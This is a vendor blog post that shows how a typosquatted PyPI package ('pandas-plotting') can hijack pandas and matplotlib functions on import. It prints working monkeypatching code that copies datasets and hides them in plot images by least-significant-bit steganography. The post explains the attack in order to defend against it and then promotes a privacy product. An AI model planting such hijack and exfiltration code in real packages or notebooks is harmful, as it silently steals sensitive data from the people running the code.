How Python Data Science Libraries Can Be Hijacked (and What You Can Do About It)
Hackers can easily hijack the data science libraries you use every day and get full access to the datasets you are working with. Data owners need tools to prevent it from happening.
Every day, a data scientist somewhere calls a common data science function, passing it a raw dataset in full. All of us often do this without a second thought - we know these libraries well, they come from reputable sources… What could go wrong?
While the sources behind these libraries may be trustworthy themselves, Python packages are vulnerable to code injections. Hackers can easily hijack them, meaning that when you call your usual data science functions, you could be giving external parties unrestricted access to your datasets.
In this article, we are going to show you exactly how data scientists could use malicious dependencies to hijack your libraries - and what you can do to protect your data!
In a Nutshell:
1. Python packages used in data science can be vulnerable to code injections, allowing hackers to hijack them and gain unrestricted access to datasets.
2. The attack described in the text involves a malicious PyPi package called 'pandas-plotting' that disguises itself as a legitimate package by including the name of a common data science library.
3. BastionLab ensures that data scientists cannot access the full dataset, and manipulations happen on the server side, complying with the defined security policies.
The Attack Begins
Let’s imagine you are a data owner in possession of a sensitive health dataset. You have contracted an external data scientist to provide valuable insights into your data. The process goes smoothly: the data scientist shares a Jupyter notebook with you through Google Colab, a practical tool you trust to do all this remotely. You check their code thoroughly to ensure it is safe before running it: it seems to use common Python data science functions only, like Matplotlib plotting functions, import trusted packages, like ‘pandas,’ and you don’t notice any suspicious commands. You run the code, see the expected outputs, and send the results back to the data scientist. Done.
Spoiler alert: you’ve been hacked.
Malicious code was hidden inside one of the PyPi packages: ‘pandas-plotting’ (malicious code we created for this article). You didn’t notice it because its name deliberately contains the name of the common data science library ‘pandas’, to help disguise itself as a legitimate package.
From there onwards, the process is quite cunning as it exploits a feature of Python: as soon as you download and import a PyPi package, the code from its init.py file will be executed without notifying the user. Usually, this file will include the necessary code to set up all the package’s submodules, but in the case of our attack, it will include code that hijacks other libraries' functions. Unaware that your trusted libraries' functions have been intercepted, you actually gave a full copy of the raw data to the so-called data scientist when you sent back the results…
For educational purposes, let’s now break the attack down into three stages: the functions are hijacked, the dataset is stolen, and the attacker retrieves the data.
Stage One: Functions Are Hijacked
The attack started when we imported the pandas-plotting package. It executed code that swapped the original function with the malicious one. Kind of like you would do when redirecting mail, here, the malicious data scientist changed the address of pandas’ read_csv() function so that any call to the original version would point to the fake one.
Function names and location pre-hijacking:
Function name in the local scope | Original function | Location in memory |
---|---|---|
read_csv | read_csv | 0x7f81edc49d80 |
fake_csv | fake_csv | 0x7f81eca42d40 |
Function names and location post-hijacking:
Function name in the local scope | Original function | Location in memory |
---|---|---|
read_csv | fake_csv | 0x7f81eca42d40 |
fake_csv | fake_csv | 0x7f81eca42d40 |
At least, changing the underlying function called when we use a function name must be really complicated to do, right?
Actually, no. It can even be achieved with exactly one line of code! But before we go over that depressing piece of news, let’s see how Python works so we understand fully why it could be so easy to leak all our datasets.
- When you download a package in Python, you get a local copy of all of the packages’ files.
- When you import the same package, Python will search for it locally and tie the results of that search to a name in the local scope.
- The package becomes an object in your local scope. This means that its functions become attributes of that object.
- Now for the key information: the built-in Python functions getattr() and setattr() allow you to get and modify any object’s attributes - including, here, the functions of the imported library!
And that’s how the harmful data scientist was able to “hijack” your functions. First, they used getattr() to go undetected by storing a copy of a function under a new name.
The way getattr() works will let it save the original function’s results and return them to you once it has run the malicious code that steals the dataset. This prevents you from spotting the attack due to unexpected return values - since you are getting the expected results.
import pandas
# save read_csv function to 'original_read_csv' alias
original_read_csv = getattr(pandas, "read_csv")
# hello can now be used exactly as read_csv() would be
dataframe = original_read_csv("covid.csv")
Then the attacker used setattr(). They provided it with three arguments: the name of the object (the imported library) the function they were targeting, and the name of the function they wished to replace it with.
import pandas
setattr(pandas, "read_csv", fake_csv)
Now that we’ve seen how getattr() and setattr() work, let’s take a look at how they were used to hijack pandas read_csv() function.
We have added comments (#) to guide you through the code.
# Hijacking the function
# `obj` -> name of the imported library object being targeted
# `name` -> name of function that’s being hijacked
# `new_fn` -> the new function that will be tied to the original
# function's name
def hijack_fn(obj, name, new_fn):
# Getting the original function from the imported library object
original = getattr(obj, name)
# Storing the copy of the original function in an `_original` attribute #
# within the new function
new_fn._original = original
# Switching the addresses of both functions to replace the original one
setattr(obj, name, new_fn)
# Importing pandas library under the ‘pd’ alias
import pandas as pd
# Using the hijack function to change the function called when we’ll use
# `pd.read_csv` to our own `read_csv` function
hijack_fn(pd, "read_csv", read_csv)
Your functions were hijacked without you noticing and it only required a few lines of code. Now let’s take a look at how your dataset can be stolen once you call the now hijacked read_csv file.
Stage Two: the Data Is Stolen
In most cases, data science starts with creating a data frame of the dataset. Accordingly, one of the first functions to be called and executed after importing dependencies at the top of the file (including our malicious pandas-plotting package) is read_csv():
dataframe = read_csv("covid_data.csv")
Since the code executed by init.py has tied the original ‘read_csv’ name to the new malicious function, it is pandas-plotting’s function that will now be called. It is defined as follows:
# `pandas-plotting` imposter `read_csv` function
# It uses generic *args and **kwargs arguments to collect any input that was
# intended to be sent to pandas’ `read_csv` function
def read_csv(*args, **kwargs):
# `_original` is where a copy of the original `read_csv` function was stored
# when the hijacking function was called
original_func = read_csv._original
# The return value from the original function is set aside
ret = original_func(*args, **kwargs)
# A copy of the return value, a Pandas dataframe containing all the data from
# the csv file, is stored in the _stolen attribute
read_csv._stolen = ret.copy()
# The original function's return value is forwarded back to the user
return ret
By making what appears to be a harmless call to read_csv(), a secret copy of your data has been created without your knowledge. But this is just the start of your troubles: next up, we are going to see how the hacker was able to trick you into sharing this stolen dataset with them by hiding it in an image.
Stage Three: the Attacker Recovers the Dataset
Up until this point, we have only mentioned one function being hijacked in the code executed by init.py upon import, but there was a second function targeted: matplotlib.pyplot’s draw() function.
Matplotlib is a common data science library used to plot data and its draw function redraws a plot after any update. It is frequently used by Matploblib’s plotting functions, like bar() which creates barplots.
# Importing the specific matplotlib submodule containing the draw function
from matplotlib.backends.backend_agg import FigureCanvasAgg
# pandas-plotting replaces this function with its own imposter function
hijack_fn(FigureCanvasAgg, "draw", draw)
Matplotlib’s draw() function was hijacked when we imported pandas-plotting and was replaced with an imposter draw function. The malicious code takes inspiration from steganography principles, where information is hidden in plain sight by concealing it within another message or physical object. It hid the dataset previously stolen by the read_csv() imposter function within an image… And not just any image! The dataset was hidden in the plot the user expected to be created by the original draw() function (or, more precisely, the bar() plotting function, which makes use of draw()).
But how can you put a dataset into an image?
With the help of existing open-source steganography functions, it’s actually not so hard!
Using one of them, the attacker was able to hide the dataset in an image that cannot be differentiated from the original image with the naked eye. This is possible because it was encoded in its "least significant bits." The dataset can then be decrypted and recovered relatively easily using the same open-source library (LSBSteg).
When you executed the code to generate a barplot of the 10 states in the US with the highest COVID deaths:
# Get the 10 states in the US with the highest Covid deaths
top10 = df.groupby("Province/State").sum()
top10 = top10.sort_values('Deaths', ascending=False)
top10 = top10.head(10)
# Create a bar plot of this data
plt.title("Most cases of covid per province/state")
plt.bar(top10.index, top10["Deaths"]) # bar() uses the draw function to generate a plot
plt.show()
You produced the following plot:
It looked as expected, so you saved the image and shared it with the external data scientist - unaware there was an extractable copy of your raw data within the image. You might even have gone on to share it publicly!
We made a Google Colab notebook to show you how the attacker would extract the dataset from this image, thanks to a steganography library available on GitHub (you can test it yourself to realize how easy that is).
Let’s finish off this section by providing you with the full imposter draw code:
# Imposter draw function
def draw(*attr, **kwargs):
# The original draw function is saved into an `_original` attribute when the
# hijack function is called and is saved in another `original_func`variable
# here
original_func = draw._original
# The original function is called and its return value stored
return_val = original_func(*attr, **kwargs)
# If there is a stolen dataset saved
if hasattr(read_csv, "_stolen") and isinstance(read_csv._stolen, pd.DataFrame):
# Importing a necessary library to execute the following code
import io
# Gets a bytes object which will be used to store the stolen data, that’s
# been converted to binary
byt = io.BytesIO()
# Pandas’ `to_parquet()` function converts the dataframe to binary
# parquet form and stores it in the bytes object
read_csv._stolen.head(500).to_parquet(byt)
# Takes attr[0], which is the matplotlib figure that has been updated by the
# call to the original draw function, and uses the buffer_rgba function to
# convert it to a buffer of rgba values
buf = attr[0].renderer.buffer_rgba()
# Instantiates a class of LSBSteg (an open source library that will let the attacker extract the data later) with the plot image as a rgba buffer
lsbsteg = LSBSteg(buf)
# Passes the dataframe in binary form to LSBSteg's encoding function, which
# will encode it into the least significant pixels of the plot image
lsbsteg.encode_binary(byt.getvalue())
# Returns the original draw function’s return value
return return_val
How can you protect your data?
This attack relies on two issues: an insecure collaborative workflow and raw data being supplied to functions that could be hijacked by malicious actors.
There aren’t many tools yet that help with those specific issues. This is why we built BastionLab, a privacy framework for data science collaboration. Its features, which cover data exploration and AI training, were designed to mitigate both of those vulnerabilities.
- First, the data owner defines a privacy policy and uploads their dataset to BastionLab’s server. This will grant customizable levels of access to the data to third parties. Our default policy ensures datasets can never be extracted in full - because we check that data is sufficiently aggregated to guarantee anonymity.
- Then, data scientists can remotely access the privacy-protected dataset. Any request that would breach the privacy policy of the data owner will either be denied or pending approval. They’ll also only be able to execute a limited amount of data science functions to prevent code injections.
This measure means that even if BastionLab’s client was hijacked, there is no way to access the data with rogue client actions or functions. Data scientists never manipulate the dataset locally: the data doesn't leave the server unless it complies with the security policy in place.
These safeguards allow data collaboration to be private while mitigating the risks born from the usual collaborative workflows!
Ready to Try BastionLab?
Get introduced in our Quick tour, which shows how the Titanic dataset can be shared with a remote data scientist while ensuring only anonymized results from the passengers aboard the ship are communicated. We also have a more real-life example with a COVID dataset as well.
For now, BastionLab works with simple scenarios, but we have many plans for it in the future - coming soon, Differential Privacy! We are open-source, so you can check our code online and help us make it as easy to use and safe as possible.
If you are interested, drop a star on GitHub, and join us on our Discord. We're always very happy to hear your feedback!